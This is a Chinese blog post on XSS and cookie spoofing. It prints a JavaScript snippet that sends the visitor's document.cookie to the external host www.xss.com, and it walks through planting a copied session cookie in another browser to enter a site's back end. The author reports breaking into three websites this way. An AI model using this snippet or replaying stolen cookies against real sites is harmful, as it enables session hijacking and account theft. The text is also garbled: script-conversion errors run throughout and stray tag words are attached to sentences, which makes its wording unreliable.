經過COOKIE欺騙登陸網站後臺

1.今天閒着沒事看了看關於XSS(跨站腳本攻擊)和CSRF(跨站請求僞造)的知識,xss表示Cross Site Scripting(跨站腳本攻擊),它與SQL注入攻擊相似,SQL注入攻擊中以SQL語句做爲用戶輸入,從而達到查詢/修改/刪除數據的目的,而在xss攻擊中,經過插入惡意腳本,實現對用戶遊覽器的控制,CSRF全名是Cross-site request forgery,是一種對網站的惡意利用,CSRF比XSS更具危險性。其實XSS攻擊就是網站輸入框沒有限制非法字符,或者沒有對腳本內容進行編碼致使的!chrome

 

var img = document.createElement('img');
img.src='http://www.xss.com?cookie='+document.cookie;
img.style.display='none';
document.getElementsByTagName('body')[0].appendChild(img);

 

好比這段代碼,當咱們沒有對網站輸入框進行非法字符的限制的話,用戶輸入了這段腳本,這樣就會神不知鬼不覺的把當前用戶的cookie發送給了個人惡意站點,個人惡意站點經過獲取get參數就拿到了用戶的cookie。固然咱們能夠經過這個方法拿到用戶各類各樣的數據。瀏覽器

 

 

2.固然我今天說的主要不是這些,而是經過你拿到的cookie,植入到你的瀏覽器中而後就能夠訪問網站後臺了,下面我來爲你們演示一遍,如何經過已存在的Cookie,進入博客園後臺,我用IE瀏覽器和Chrome瀏覽器來測試!安全

首先咱們經過IE瀏覽器拿到咱們登入博客園後的Cookie,經過IECookiesview插件能夠查看到IE瀏覽器下全部的Cookie信息,而後咱們找到cnblogs.com站點下的Cookie,而後複製下.CNBlogsCookie和key和value值,如圖所示! cookie

 

3.衆所周知,cookies屬於隱私數據,不一樣瀏覽器保存在不一樣地方。不可能共享的,此時咱們再次打開Chorme瀏覽器,如圖IE瀏覽器爲登陸狀態,而chorme瀏覽器爲未登陸狀態app

 

 

4.那麼此時咱們就將剛拷貝的IE瀏覽器下博客園的cookie數據植入到chrome瀏覽器中,實現cookie欺騙登陸到博客園後臺,在chrome瀏覽器中添加cookies擴展程序,方便寫入和刪除cookiexss

 

 

5.而後打開cookies插件,咱們就找到cnblogs.com下的cookie,默認沒有登陸的時候是沒有.CNBlogsCookie這個cookie的, 而後咱們點擊添加一個cookie,將.CNBlogsCookie和key和value值寫入進去,再刷新網站頁面,成功進入博客園網站後臺!  測試

 

 

6.若是將這個方法,再結合到開始講的XSS攻擊的話獲取到別人網站的cookie信息,那麼黑進別人網站的後臺就很容易了,我本身也試了三個網站,都是能夠成功進入的! 固然我說這些不是爲了讓你們黑別人的網站,只是只有弄懂了這些,才能更好的防範,保證本身開發的網站的安全! 網站

相關文章
相關標籤/搜索